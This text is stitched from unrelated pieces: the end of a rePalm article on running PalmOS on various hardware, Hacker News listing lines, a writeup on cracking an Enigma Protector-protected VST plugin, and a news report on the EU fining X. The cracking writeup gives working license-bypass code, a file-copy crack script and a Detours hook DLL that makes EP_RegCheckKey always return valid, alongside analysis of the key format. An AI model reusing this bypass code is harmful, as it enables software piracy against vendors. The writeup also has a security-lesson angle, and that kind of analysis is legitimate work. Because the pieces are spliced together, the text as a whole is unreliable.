But wait: if the filesystem is read-only, it DOES support hard links! More than one directory entry may reference the same cluster chain. This is only a problem when a file is deleted, which never happens on a read-only filesystem. The filesystem thus contains a PALM directory in the root. That contains a DEFAULT.ARN file pointing to a cluster with its contents, a PROGRAMS directory, a LAUNCHER directory, and a directory entry named START.PRC pointing to the first cluster of our driver. PROGRAMS contains an MSFILES directory, which itself contains another directory entry pointing to the driver, this one named DRIVER.PRC. /PALM/LAUNCHER contains the third directory entry pointing to the driver, also named DRIVER.PRC. PalmOS does not do a filesystem check on read-only media, so no issue is ever hit - it all works.
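
Here is the trick as a sketch, using the standard 32-byte FAT directory entry layout; the cluster number and file size below are illustrative only:

#include <stdint.h>

#pragma pack(push, 1)
typedef struct {            /* standard FAT 8.3 directory entry  */
    char     name[11];      /* name + extension, space padded    */
    uint8_t  attr;          /* 0x01 = read-only                  */
    uint8_t  reserved[14];
    uint16_t firstCluster;  /* start of the file's cluster chain */
    uint32_t fileSize;
} FatDirEnt;
#pragma pack(pop)

enum { DRIVER_CLUSTER = 3, DRIVER_SIZE = 48 * 1024 }; /* illustrative values */

/* three "hard links": one entry per directory, all pointing at the same
   cluster chain - safe only because the medium is read-only */
static const FatDirEnt palmStartPrc   = { "START   PRC", 0x01, {0}, DRIVER_CLUSTER, DRIVER_SIZE };
static const FatDirEnt msfilesDriver  = { "DRIVER  PRC", 0x01, {0}, DRIVER_CLUSTER, DRIVER_SIZE };
static const FatDirEnt launcherDriver = { "DRIVER  PRC", 0x01, {0}, DRIVER_CLUSTER, DRIVER_SIZE };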

MSIO performance

Some Sony devices have an actual exported MSIO API in their MemoryStick drivers, which I was able to reverse engineer (and publish). Some others did not, but Sony published updates that included such an API. Usually these updates came with MSIO peripherals like the MemoryStick Bluetooth adapter or the MemoryStick Camera. And some devices never had any official MSIO support at all. I wanted to support them all, and since I had already reverse engineered how the MemoryStick host chip (MB86189) worked, I was able to just write my own drivers talking to it directly. This worked for some devices. Others do not have direct access to the chip, since the DSP controls it. The Sony DSP is not documented, the firmware is encrypted, and the key is not known. Here I was stuck for a while. Eventually I figured out just enough to be able to send and receive raw TPCs via the DSP. This worked well on almost all devices, except the N7xx series. Their DSP firmware was the oldest of all (as far as I can tell), and the best bandwidth I was able to coax out of it was 176Kbit/s. Needless to say, this is not quite good enough for live video (basically what rePalm does). It works, but the quality is not great.

As MSIO allows no more than 512 bytes per transfer, transferring screen image data is complex. The same compression is used here as was used in reSpring. Even then, performance varies based on the device and screen configuration. On low-resolution devices, everything is fast. On high-resolution ones (except the N7xx), 35 FPS is reachable in 16-bits-per-pixel mode. It is faster on greyscale devices. The lone PalmOS 4 HiRes+ device (NR70V) lags behind at around 20 FPS. This is simply because there is so much data to transfer each frame - 300KB.
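
The transfer loop itself is conceptually trivial (the compression is where the real work happens); a sketch, with a hypothetical msioWrite:

#include <stdint.h>
#include <stddef.h>

#define MSIO_MAX_XFER 512 /* hard protocol limit per transfer */

extern void msioWrite(const uint8_t *buf, size_t len); /* hypothetical */

/* push one compressed frame across MSIO in 512-byte-or-smaller pieces */
static void sendFrame(const uint8_t *frame, size_t len)
{
    while (len) {
        size_t chunk = (len > MSIO_MAX_XFER) ? MSIO_MAX_XFER : len;
        msioWrite(frame, chunk);
        frame += chunk;
        len -= chunk;
    }
}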

Other loose ends

Curiously, it seems that Asus licensed the MemoryStick IP from Sony, so the Asus PalmOS devices (the s10 and s60 families) also use MemoryStick. I added support for them. For each device, I wired up as much as possible to rePalm. Devices with an LED have it wired to the attention manager; devices with a vibrate motor have that wired up as well. Sound is a bit more complex. Some of these devices had a DSP for MP3 decoding, but the ability to play raw sampled sound is limited, since the 68K was unlikely to be able to do it fast enough anyway. There exists a Sony API to play 8KHz 4-bits-per-sample ADPCM. I considered wiring that up to the sound output of rePalm, but did not get around to it; it is likely not worth it, as the quality would be atrocious. I did consider the alternative - have rePalm encode its output as MP3 and somehow find a way to feed that to the DSP - but I was stymied in my efforts. In most of the devices, the DSP firmware reads the MP3 file directly from the MemoryStick, bypassing the OS entirely, leading me to believe that I might not find a way to inject MP3 data even if I produced it.

Initially, I did the development on an STM32H7B0RB. This variant has only 128KB of flash, which is, of course, not enough to contain PalmOS. I used some of the RAM to hold a ROM image, which I loaded over SWD each time. This worked well enough, but was not really fun, as it could not be used away from a computer. Luckily, I was able (with a lot of help from an unnamed source) to get some STM32H7 chips with 2MB of internal flash. This IS enough to fit PalmOS, so now I have variants that boot directly on insertion. The latest boards also have some onboard NAND flash that acts as built-in storage for the user, using my FTL mentioned before. The photo album (linked above) has more photos and videos! Here is one. Enjoy!

AximX3

Axim X3 running PalmOS

This was a fun target, just for shits and giggles. As this device runs an ARMv5T CPU, my kernel was forced to adapt to that world. It was not terribly difficult, and it works now. Curiously, this device is internally rather similar to the Palm Tungsten T3, so this same rePalm build can run, with few modifications, on the T|T3 as well.

I put a lot of work into this device. Luckily, a lot of the initial investigation of the hardware was already done as part of my uARM-Palm project. Almost everything works: audio in and out, the SD card, infrared, touch and buttons, battery reporting, and the screen. Only USB and sleep/wake are missing. The first I see no point in; the second is complicated by the built-in bootloader. Initial builds used a WinCE loader I wrote to load the ROM into RAM and run from there. Further investigation of the device ROM showed me that there is a rather complete bootloader in there, capable of flashing the device ROM from the SD card. I decided to exploit that, and with some changes, rePalm can now be flashed to the device's ROM and boot directly. Yes!

How? The stock bootloader has a mode for this. If an image file is placed on the SD card as /P16R_K0.NB0, the card is inserted, the jog wheel select and the second app button are held, and the device is reset, it will flash the image to flash, right after the bootloader. This can be used to flash rePalm, or to reflash the stock image. Depending on the Axim X3 version (there are three), the amount of flash and RAM differs. rePalm detects the available RAM and uses it all!

STM32F469 Discovery Board

STM32F469DISCO board running PalmOS

This was a quick little hack to see, in real life, PalmOS running on a 3x-density display; no such device ever shipped. The STM32F469DISCOVERY board has a 480x800 display, of which 480x720 is used as a 3x-density display with a dynamic input area. The board has a capacitive touchscreen, which makes it ill-suited for PalmOS: capacitive touchscreens are very bad for precise tapping of small elements, since your finger obscures whatever it is you are trying to tap. This screen being rather large helps a little, but not all that much. I got the board working well enough to see what it is like, but put little work into it afterwards. The screen, touch, and SD card are the only things supported. It does not help that, just like the STM32F429, the STM32F469 lacks any cache, making it rather slow when running out of SDRAM.

RP2040

Raspberry Pi Pico running PalmOS

It is possible!

How little RAM/CPU does PalmOS 5 really require? Since rePalm had support (at least in theory) for Cortex-M0, I wanted to try it on real hardware, as previously the support had been tested only on CortexEmu. There does happen to be one Cortex-M0 chip out there with enough RAM: the RP2040, the chip in the $4 Raspberry Pi Pico. I then sought out a display with a touchscreen that could be easily bought. There were actually not that many options, but this one seemed like a good fit. It turned out, after some investigation, that driving it properly and quickly would not be at all easy. RP2040's special sauce - the PIO - to the rescue! I found a way to do it. I switched the resistors on the screen's board from "SPI" to "SDIO" to enable the SD card, and I wired up the LED to be the alarm LED for PalmOS. Those were the easy things.

As this project depends on some undocumented behaviour in the Cortex-M chips, it was always unknown what would happen in some cases. For example, the Cortex-M3 causes a UsageFault when you jump to an address without the bottom bit set, indicating a switch to ARM mode. What would the Cortex-M0 do? Turns out it simply causes a HardFault. m0FaultDispatch to the rescue! It is able to categorize all the causes of a HardFault and wire them to the proper place. I did find one difference from the Cortex-M3. When the Cortex-M3 executes a BX PC instruction, it will execute a jump to the current address plus 4, in ARM mode. This differs from what ARMv5 chips do when you execute that same instruction in Thumb mode: they jump to the current address plus 4, rounded down to the nearest multiple of 4, in ARM mode. This difference my JIT and emulator code already handled. But the Cortex-M0 does yet a third thing: it seems to treat the instruction itself as invalid. PC is not changed, mode is not changed, and a HardFault is taken right on the instruction itself. Curiously, this does not happen if another register (with the low bit clear) is used instead of PC. Well, in any case, I adjusted the JIT and the emulator code to handle this, and modified CortexEmu to emulate it properly.
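
Summarized as code, the three BX PC behaviours an emulator or JIT has to model look roughly like this (the enum and helper names here are hypothetical):

#include <stdint.h>

typedef enum { CORE_ARMV5, CORE_M3, CORE_M0 } CoreKind;

extern void branchToArm(uint32_t addr); /* hypothetical emulator helpers */
extern void takeUsageFault(void);
extern void takeHardFault(uint32_t atInsn);

/* pc = address of the BX PC instruction itself, executing in Thumb mode */
static void emulateBxPc(CoreKind core, uint32_t pc)
{
    switch (core) {
    case CORE_ARMV5: /* jump to pc+4 rounded down to a multiple of 4, ARM mode */
        branchToArm((pc + 4) & ~3u);
        break;
    case CORE_M3:    /* jumps to pc+4 "in ARM mode", which faults on Cortex-M */
        takeUsageFault();
        break;
    case CORE_M0:    /* the instruction itself is treated as invalid: PC and
                        mode are unchanged, and a HardFault is taken on it */
        takeHardFault(pc);
        break;
    }
}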

Memories

The RP2040 lacks onboard flash; it uses an external Q/D/SPI flash for code and data storage. This is convenient when you have a lot of data: for rePalm, it means we can have a ROM as big as the biggest flash chip we can buy. The Pi Pico comes with a 2MB chip, so I targeted that. The RAM situation is much tighter. There is just 264KB of RAM in there, which is not much; the last PalmOS device to have this little RAM ran PalmOS 1.0. But it is worth trying. One of the largest RAM expenditures is graphics, primarily the framebuffer. PalmOS assumes that the display has a framebuffer directly accessible by the CPU. This means that if I wanted to use the entire 320x240 display in truecolor mode, the framebuffer would occupy 150KB. Oof! Well, how much IS acceptable?

Some experimentation followed. To boot successfully and launch the launcher, the preferences app, and the digitizer calibration panel, approximately 128KB of dynamic RAM is necessary. The various default databases, as well as PACE's temporary databases in the storage heap, mandate a storage heap of at least 50KB; a 64KB minimum storage heap is really preferred, so we do not immediately run out of space at boot. And rePalm's DAL needs at least 15KB of memory for its data structures and about 24KB for the kernel heap, where stacks and various other data structures are allocated. Let's add those up: the sum is 231KB. That leaves at most 33KB for the framebuffer. There are a few options. We can use the whole screen at 2 bits per pixel (4 greys), which needs an 18.75KB framebuffer. We can use a square 240x240 screen at 4 bits per pixel, for a 28.125KB framebuffer. Or we can use the standard low-density resolution of 160x160 at a whopping 8 bits per pixel (the only non-greyscale option), for 25KB.
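
The framebuffer arithmetic is just width x height x bits-per-pixel, divided by 8; as a sanity check:

/* framebuffer size in bytes for the candidate modes */
static unsigned fbBytes(unsigned w, unsigned h, unsigned bpp)
{
    return (w * h * bpp) / 8;
}

/* fbBytes(320, 240, 2) == 19200 -> 18.75KB  (whole screen, 4 greys)
   fbBytes(240, 240, 4) == 28800 -> 28.125KB (square screen, 16 greys)
   fbBytes(160, 160, 8) == 25600 -> 25KB     (low density, color)     */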

One might notice that the memory areas above did not include a JIT translation cache. This is correct. While my JIT does indeed support targeting the Cortex-M0, there simply is not enough space to make it worthwhile. I instead enabled the asmM0 ARM emulator core, since it needs no extra space of any sort. Not wonderful, but oh well - we knew all along that compromises would need to be made! As long as I'm just showing off, let's have a full-screen experience, with a dynamic input area and all: 320x240 it is! The second core of the RP2040 is not currently used (yet).

PACE again

My previously-mentioned Cortex-M3-targeting patched PACE is of no use on a Cortex-M0. Combine this with the fact that I cannot use the JIT, and all the 68K code would be running under double emulation (68K emulated by ARM code, with that ARM code itself emulated in Thumb). It was time to write a whole new 68K emulator - in Thumb-1 assembly, of course. I give you PACE.m0. It is actually rather fast, competing well with Palm's ARM PACE in performance, as tested on my Tungsten T3. It really helped make the RP2040 build usable: it is now no slower than a Tungsten T was.

So where does this leave us?

There is still a lot to do: implement BT, WiFi, and USB, debug NVFS some more, and probably many more things. However, I am releasing some little preview images to try, if you happen to have an STM32F429 Discovery board, an Axim X3, or a Raspberry Pi Pico with the proper screen. There is no USB support yet. Anyway, if you want to play with it, here: LINK . I am also continuing to work on the reSpring, MSIO, and other hardware options, and you might even be able to get your hands on one soon :) If you already have a reSpring module (you know who you are), the archive linked above has an update to 1.3.0.0 for you too.

Source Code

Source intro

The version 0000 source download is here. This is a very, very early release of the source code, just to let people browse the codebase and see what it is. The README explains the basic directory structure, and there is a LICENSE document in each directory. Building this requires a modern (read: mine) build of PilRC (included) and an ARM cross-gcc toolchain. Some builds also require a PalmOS-specific 68K toolchain, from here , for example.

Building basics

Building a working image is a multi-step process. First, the DAL needs to be built. This is accomplished by running make in the myrom/dal directory, with some parameters passed to it. For example, to build for the Raspberry Pi Pico with the Waveshare display, the command make BUILD=RP2040_Waveshare will do. In some cases, the makefile itself will need to be edited. For the abovementioned build, for example, we do not want to use the JIT, preferring the emulator instead; to do this, comment out the line ENABLE_JIT = yes and uncomment the one that says EMU_CORE = asmM0 . This will build the DAL.prc. The next step is to build a full ROM image. This is done from the myrom directory, again using make. The parameters now are the build type (which determines the ROM image parameters) and the directory of files to include in the ROM. For the RP2040_Waveshare build, the proper incantation is make RP2040_Waveshare FILESDIR=files_RP2040_Waveshare . The given files directory already contains some other pieces of rePalm, like PACE and the rePalm information preferences panel.

Building PACE

The PACE patch is a binary patch onto PACE. It is built in a few steps. First, the patch itself is assembled using make in the myrom/paceM0 directory; this produces the patch as a ".bin" file. Then, using the patchpace tool (which you must also build), you can apply this patch to an unmodified PACE.prc file (a copy of which can be found, for example, in the AximX3 directory). This patched PACE can then replace the stock one in the destination files directory.

Article update history

  1. image above was updated to v00001: JIT is now on (much faster), RTC works (time), notepad added, touch response improved
  2. image above was updated to v00002: graffiti area now drawn, graffiti works, more apps added (Bejeweled removed for space reasons)
  3. image above was updated to v00003: ROM is now compressed to allow more things to be in it. This is OK since we unpack it to RAM anyway. Some work was done on SD card support
  4. Explained how LDM/STM are translated
  5. Wrote a bit about SD card support
  6. Wrote a bit about serial port support
  7. Wrote a bit about Vibrate & LED support
  8. Wrote the first part about NetIF drivers
  9. image above was updated to v00004: some drawing issues fixed (underline under memopad text field), alert LED now works, SD card works (if you wire it up to the board)
  10. image above was updated to v00005: some support for 1.5-density displays works, so the image now uses the full screen
  11. Wrote the document section on 1.5-density display support
  12. Wrote the document section on DIA support and uploaded v000006 image with it
  13. Wrote a section on PACE, uploaded image v000007 with much faster 68k execution and some DIA fixes
  14. Uploaded image v000008 with IrDA support
  15. Wrote about audio support
  16. Wrote about reSpring
  17. Uploaded image v000009 with preliminary audio support
  18. Uploaded image v000010 with new JIT backend and multiple JIT fixes
  19. Uploaded image v000011 with an improved JIT backend and more JIT fixes, and an SD-card based updater. Wrote about the Cortex-M0 backend
  20. Wrote a lot about reSpring hardware v1 bring up and current status
  21. Uploaded STM32F429 discovery image v000012 with significant speedups and some fixes (graffiti, notepad)! (this corresponds to rePalm v 1.1.1.8)
  22. Uploaded STM32F429 and, for the first time ever, reSpring images for v 1.3.0.0 with many speedups, wrote about mic support and Zodiac support
  23. Apr 15, 2023: PACE for M0, rePalm hardware update: MSIO, AximX3, RP2040, new downloads
  24. Sep 3, 2023: Source code posted for the first time

Have I been Flocked? – Check if your license plate is being watched

Hacker News
haveibeenflocked.com
2025-12-06 03:16:35
Comments...

I cracked a $200 software protection with xcopy

Hacker News
www.ud2.rip
2025-12-06 02:37:58
Comments...
Original Article

disclaimer: this is educational security research only. i do not condone piracy. i purchased a legitimate license for this software and conducted this analysis on my own property. this writeup exists to document protection implementation flaws, not to enable theft. support developers - buy their software.

github repo: vmfunc/enigma

tl;dr

i spent a day analyzing enigma protector - a $200 commercial software protection system used by thousands of vendors. RSA cryptographic signatures, hardware-bound licensing, anti-debugging, VM-based code obfuscation. serious enterprise security theater.

then i noticed the protected installer extracts a completely unprotected payload to disk.

xcopy /E "C:\Program Files\...\product" .\crack\

that’s the entire crack. copy the installed files. they run on any machine. no keygen needed, no binary patching, no cryptanalysis.

$200 protection defeated by a command that shipped with DOS 3.2 in 1986.

this is a case study in why threat modeling matters more than fancy cryptography, and why “military-grade encryption” means nothing when you leave the back door wide open.


target overview

Bass Bully Premium VST3 - Landing Page Screenshot

bass bully premium - a VST3 synthesizer plugin. protected by enigma protector, a commercial software protection system that costs $250+ and promises serious security.

from their marketing:

“Enigma Protector is a powerful tool designed to protect executable files from illegal copying, hacking, modification and analysis.”

we’ll see about that.

we have one known valid license:

Key:  GLUJ-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-V99KP3
HWID: 3148CC-XXXXXX
Name: Bass Bully

our goal: understand the protection and build a proper crack


static analysis

first, let’s look at what we’re dealing with:

import pefile

pe = pefile.PE(r"Bass Bully Premium_Installer_win64.exe")

print(f"Machine:     {'x64' if pe.FILE_HEADER.Machine == 0x8664 else 'x86'}")
print(f"Sections:    {pe.FILE_HEADER.NumberOfSections}")
print(f"Entry Point: 0x{pe.OPTIONAL_HEADER.AddressOfEntryPoint:X}")
print(f"Image Base:  0x{pe.OPTIONAL_HEADER.ImageBase:X}")
Machine:     x64
Sections:    9
Entry Point: 0x16485D0
Image Base:  0x140000000

that entry point is suspicious. 0x16485D0 is way into the binary... typical of packed executables where the real entry point is hidden. normal programs start around 0x1000.

string hunting

pe_path = r"Bass Bully Premium_Installer_win64.exe"

with open(pe_path, 'rb') as f:
    data = f.read()

for target in [b'Enigma Protector', b'enigmaprotector']:
    offset = 0
    while (idx := data.find(target, offset)) != -1:
        print(f"0x{idx:08X}: {target.decode()}")
        offset = idx + 1
0x0040972B: Enigma Protector
0x00409746: Enigma Protector
0x00409786: Enigma Protector
0x00409BA8: Enigma Protector
0x00409BC3: Enigma Protector
0x0040A038: Enigma Protector
0x0040A053: Enigma Protector
0x004099BF: enigmaprotector
0x00409DDA: enigmaprotector

confirmed: enigma protector. now we know what we’re dealing with.

what about the network?

does this even phone home..?

imports = [entry.dll.decode() for entry in pe.DIRECTORY_ENTRY_IMPORT]
kernel32.dll, user32.dll, advapi32.dll, oleaut32.dll, gdi32.dll,
shell32.dll, version.dll, ole32.dll, COMDLG32.dll, MSVCP140.dll, ...

no winhttp.dll, wininet.dll, or ws2_32.dll. offline validation only. all crypto is local, so theoretically extractable.

this is good news!! online validation would require MITM or server emulation. offline means everything we need is in the binary.


the enigma protector internals

enigma protector is a commercial protection system that provides:

  1. code virtualization - transforms x86/x64 into proprietary VM bytecode
  2. anti-debugging - IsDebuggerPresent , timing checks, hardware BP detection
  3. anti-tampering - CRC checks on packed sections
  4. registration API - HWID-bound licensing with RSA signatures

you can read about all these features on their documentation page . they’re pretty thorough about explaining what they protect against. they just didn’t think someone would… not use it on the payload.

The Enigma Protection and motivation for buying - diagram showing protection levels

the registration API

according to enigma’s SDK, these functions are exposed:

int EP_RegCheckKey(const char* name, const char* key);
const char* EP_RegHardwareID(void);
void EP_RegSaveKey(const char* name, const char* key);
void EP_RegLoadKey(char* name, char* key);

these aren’t normal exports; they’re resolved dynamically after enigma unpacks itself. you can’t just GetProcAddress them from outside. you have to either:

  • hook them at runtime after unpacking
  • pattern scan the unpacked memory (see the sketch after this list)
  • be an absolute clown and just not use them in your payload (definitely not foreshadowing)
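
for the pattern-scan route, the core of it is just a masked byte search over the unpacked image. a minimal sketch in C - the signature bytes below are placeholders, not a real EP_RegCheckKey prologue:

#include <stdint.h>
#include <stddef.h>

/* find `pat` in [base, base+len); bytes equal to `wildcard` match anything */
static uint8_t *patternScan(uint8_t *base, size_t len,
                            const uint8_t *pat, size_t patLen, uint8_t wildcard)
{
    for (size_t i = 0; i + patLen <= len; i++) {
        size_t j = 0;
        while (j < patLen && (pat[j] == wildcard || base[i + j] == pat[j]))
            j++;
        if (j == patLen)
            return base + i;
    }
    return NULL;
}

/* placeholder signature - NOT the real prologue of EP_RegCheckKey */
static const uint8_t kSig[] = { 0x48, 0x89, 0x5C, 0x24, 0xCC, 0x57 };
/* usage: patternScan(unpackedBase, unpackedSize, kSig, sizeof kSig, 0xCC); */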

the entry point

using capstone to disassemble the entry point:

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

entry_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint
entry_offset = pe.get_offset_from_rva(entry_rva)

with open(pe_path, 'rb') as f:
    f.seek(entry_offset)
    code = f.read(64)

md = Cs(CS_ARCH_X86, CS_MODE_64)
base = pe.OPTIONAL_HEADER.ImageBase + entry_rva

for insn in md.disasm(code, base):
    print(f"0x{insn.address:X}: {insn.mnemonic:8} {insn.op_str}")
0x1416485D0: jmp      0x1416485da      ; skip garbage bytes
0x1416485D2: add      byte ptr [rsi + 0x40], dl
0x1416485D8: add      byte ptr [rax], al
0x1416485DA: push     rax              ; real code starts here
0x1416485DB: push     rcx
0x1416485DC: push     rdx
0x1416485DD: push     rbx
0x1416485DE: push     rbp
0x1416485DF: push     rsi
0x1416485E0: push     rdi
0x1416485E1: push     r8
0x1416485E3: push     r9

the jmp-over-garbage pattern is classic anti-disassembly. linear disassemblers will try to decode the garbage bytes between jmp and its target, producing nonsense. the real unpacker starts at 0x1416485DA with a standard register preservation sequence before calling the enigma loader.


key format analysis

we have a known valid key. let’s understand its structure before we try to break it.

GLUJ-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-V99KP3

structure breakdown

  • 8 groups separated by dashes
  • groups 0-6: 4 characters each
  • group 7: 6 characters (larger - likely checksum/signature)
  • character set: 0-9, A-Z (base36)

base36 decoding

key = "GLUJ-QE58-U3Z4-RQTJ-K7GJ-JXZ5-CVK5-V99KP3"
groups = key.split('-')

for i, group in enumerate(groups):
    val = int(group, 36)
    bits = val.bit_length()
    print(f"[{i}] {group:6} = {val:10} (0x{val:08X}) {bits:2} bits")
[0] GLUJ   =     774811 (0x000BD29B) 20 bits
[1] QE58   =    1231388 (0x0012CA1C) 21 bits
[2] U3Z4   =    1404832 (0x00156FA0) 21 bits
[3] RQTJ   =    1294471 (0x0013C087) 21 bits
[4] K7GJ   =     942787 (0x000E62C3) 20 bits
[5] JXZ5   =     930497 (0x000E32C1) 20 bits
[6] CVK5   =     600773 (0x00092AC5) 20 bits
[7] V99KP3 = 1890014727 (0x70A75607) 31 bits  <- significantly larger

interesting. group 7 is way bigger than the others. that’s probably a truncated cryptographic signature.

cryptographic structure

the key structure appears to be:

[    DATA: ~143 bits     ] [ SIGNATURE: 31 bits ]
 Groups 0-6 (7 x ~20 bits)   Group 7 (truncated)

enigma uses RSA for signing. the full signature would be much larger, but they truncate it to fit the key format. this means:

  1. public key is embedded in the protected binary
  2. key validation = RSA signature verification
  3. keygen would require extracting and factoring the RSA modulus

RSA with small key sizes is technically factorable with enough compute. but that’s a lot of work for… well, you’ll see.

HWID format

hwid = "3148CC-059521"
parts = hwid.split('-')
# Two 24-bit values = 48 bits total hardware fingerprint

HWID is derived from hardware characteristics (CPU ID, disk serial, MAC address, etc). the key is cryptographically bound to this value, so a key generated for one machine won’t work on another.

this is actually decent protection! if they used it properly! (they didn’t lmao)


the pivot

at this point i’m preparing to either factor the RSA key or do runtime hooking to bypass validation. then i thought: wait, what are we actually protecting here?

let me just check the installed VST real quick…

analyzing the installed VST

vst_path = r"C:\Program Files\Common Files\VST3\Bass Bully VST\Bass Bully Premium.vst3"
vst_dll = vst_path + r"\Contents\x86_64-win\Bass Bully Premium.vst3"
pe_vst = pefile.PE(vst_dll)

print(f"Size: {os.path.getsize(vst_dll):,} bytes")
print("Imports:")
for entry in pe_vst.DIRECTORY_ENTRY_IMPORT:
    print(f"  {entry.dll.decode()}")
Size: 7,092,736 bytes
Imports:
  KERNEL32.dll
  USER32.dll
  GDI32.dll
  SHELL32.dll
  ole32.dll
  OLEAUT32.dll
  MSVCP140.dll
  WINMM.dll
  IMM32.dll
  dxgi.dll
  VCRUNTIME140.dll
  VCRUNTIME140_1.dll
  api-ms-win-crt-runtime-l1-1-0.dll
  ...

wait. where are the enigma imports?

hunting for protection

with open(vst_dll, 'rb') as f:
    data = f.read()

for term in [b'Enigma', b'EP_Reg', b'Registration', b'HWID', b'enigma']:
    count = data.count(term)
    print(f"{term.decode():15} : {count} occurrences")
Enigma          : 0 occurrences
EP_Reg          : 0 occurrences
Registration    : 0 occurrences
HWID            : 0 occurrences
enigma          : 0 occurrences

zero.

hold on.

$ strings "Bass Bully Premium.vst3" | grep -i enigma
$ strings "Bass Bully Premium.vst3" | grep -i regist

nothing. no output… ?????????

you have got to be kidding me.

the VST has absolutely no protection. it’s a clean JUCE framework build. no enigma runtime. no license callbacks. no protection whatsoever.

they protected the installer. not the payload. THE INSTALLER. NOT THE ACTUAL PRODUCT.

i can’t even be mad. this is genuinely hilarious.


the vulnerability

here’s what’s happening:

+-------------------------------------------------------------------+
|                    ENIGMA PROTECTOR                               |
|  +--------------------------------------------------------------+ |
|  |  Installer.exe                                               | |
|  |  [x] RSA key verification                                    | |
|  |  [x] HWID binding                                            | |
|  |  [x] Anti-debug, anti-tamper                                 | |
|  |  [x] Code virtualization                                     | |
|  |                        |                                     | |
|  |                        v                                     | |
|  |  +--------------------------------------------------------+  | |
|  |  |  Payload (extracted on install)                        |  | |
|  |  |  - Bass Bully Premium.vst3  <- ZERO PROTECTION lol     |  | |
|  |  |  - Bass Bully Premium.rom   <- NOT EVEN ENCRYPTED      |  | |
|  |  +--------------------------------------------------------+  | |
|  +--------------------------------------------------------------+ |
+-------------------------------------------------------------------+

the entire protection stack only controls whether the installer runs. once files hit disk, the protection is basically useless.

this is like putting a vault door on a tent.

what they should have done

enigma would have been effective if the VST itself checked the license:

bool VST_Init() {
    char key[256], name[256];
    EP_RegLoadKey(name, key);

    if (!EP_RegCheckKey(name, key)) {
        ShowTrialNag();
        return false;
    }

    CreateThread(NULL, 0, LicenseWatchdog, NULL, 0, NULL);
    return true;
}

instead, the VST has no EP_Reg* calls. no license checks. no callbacks. nothing. it just… runs.


the crack

the crack is embarrassingly simple. i spent hours analyzing RSA key formats for this…

the very sophisticated exploit

xcopy /E "C:\Program Files\Common Files\VST3\Bass Bully VST" .\crack\
copy "C:\ProgramData\Bass Bully VST\Bass Bully Premium\*.rom" .\crack\

that’s it. that’s the crack. copy the files. they work on any machine because there’s no license check in the actual product.

i wrote a python script to automate it because i have some self-respect:

#!/usr/bin/env python3
import shutil
from pathlib import Path

VST_SRC = Path(r"C:\Program Files\Common Files\VST3\Bass Bully VST\Bass Bully Premium.vst3")
ROM_SRC = Path(r"C:\ProgramData\Bass Bully VST\Bass Bully Premium\Bass Bully Premium.rom")

def extract():
    out = Path("crack_package")
    out.mkdir(exist_ok=True)
    shutil.copytree(VST_SRC, out / "Bass Bully Premium.vst3", dirs_exist_ok=True)
    shutil.copy2(ROM_SRC, out / "Bass Bully Premium.rom")
    print("[+] done")

if __name__ == "__main__":
    extract()

usage:

python patcher.py

load in fl studio. no registration. no nag. no nothing. because there’s no check.


for science: the hook approach

we also wrote a DLL that hooks enigma’s validation at runtime. completely unnecessary given the vulnerability, but i’d already done the research so here it is:

#include <windows.h>
#include <detours.h>

// enigma's functions are not normal exports: the real address has to be
// resolved at runtime (e.g. by pattern scanning the unpacked image) before
// it can be detoured. FindCheckKeyInUnpackedImage is a hypothetical helper
// that does that scan; it is not shown here.
extern PVOID FindCheckKeyInUnpackedImage(void);

static int (WINAPI *Real_EP_RegCheckKey)(LPCSTR, LPCSTR) = NULL;

// replacement: report every key as valid
int WINAPI Hooked_EP_RegCheckKey(LPCSTR name, LPCSTR key) {
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        Sleep(2000);  // crude wait for enigma's unpacker to finish
        Real_EP_RegCheckKey =
            (int (WINAPI *)(LPCSTR, LPCSTR))FindCheckKeyInUnpackedImage();
        if (Real_EP_RegCheckKey == NULL)
            return TRUE;  // target not found; leave the process alone
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach(&(PVOID&)Real_EP_RegCheckKey, Hooked_EP_RegCheckKey);
        DetourTransactionCommit();
    }
    return TRUE;
}

this approach works great. completely unnecessary. the payload has no protection.

Screenshot showing hook approach Screenshot showing hook approach result


lessons learned

for developers

  1. protect the payload, not the installer - if users need the installed files to run your software, those files need runtime protection

  2. defense in depth - don’t rely on a single layer. the VST should call EP_RegCheckKey on load

  3. threat model correctly - ask “what happens after installation?” if the answer is “nothing checks the license”, you have a problem

  4. periodic validation - one-time checks are trivially bypassed by file copying

for reversers

  1. always check the payload first - before diving into complex crypto, verify what you’re actually protecting

  2. the simplest attack wins - don’t factor RSA when xcopy works

  3. protection != security - expensive protection systems are worthless if applied incorrectly

  4. sometimes the crack writes itself - not every target requires sophisticated techniques


conclusion

enigma protector’s $250 protection was defeated by:

xcopy /E "C:\Program Files\..." .\crack\

the protection itself works fine - RSA signatures, HWID binding, anti-debug. but it only protects the installer. the payload runs completely unprotected.

250 dollars for this…

EU hits X with €120M fine for breaching the Digital Services Act

Hacker News
www.dw.com
2025-12-06 02:32:01
Comments...
Original Article

The European Union has fined Elon Musk's social media platform X €120 million ($140 million) for breaching its transparency rules set out in its Digital Services Act (DSA) .

"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU," said European Commission Vice President Henna Virkkunen.

Pre-empting the announcement on Thursday night, United States Vice President JD Vance said that "the EU should be supporting free speech not attacking American companies over garbage."

Virkkunen said the ruling had "nothing to do with censorship," adding: "If you comply with our rules, you don't get a fine. It's as simple as that."

Why has the EU fined X?

The heavy fine is the first such punishment issued by the European Commission, which began its investigations into X in December 2023.

Among other things, Brussels accuses the platform of using the white and blue checkmarks for paid user accounts to falsely suggest that these accounts are authentic and verified.

The Commission also criticized the fact that it is not always clear who is behind advertising on X.

DSA fines can be as high as 6% of a company's annual global revenue, but the Commission said X's annual turnover didn't play a direct role in the calculation of the fine.

According to the EU decision, the penalty consists of three parts: €45 million for the verification checkmarks, €35 million for the lack of advertising transparency, and €40 million for the lack of data access for researchers.

"We are not here to impose the highest fines," insisted Virkkunen. "We are here to make sure that our digital legislation is enforced."

Additional "very broad" investigations into Musk's platform are ongoing, according to the EU, including into whether X has taken sufficient action to combat the spread of illegal content and manipulated information.

How has the US government reacted to the EU fining X?

The US government has criticized the bloc for "regulatory suffocation" and threatened trade consequences, with US Commerce Secretary Howard Lutnick last week pressing the EU to rethink its rules if it wants lower steel duties.

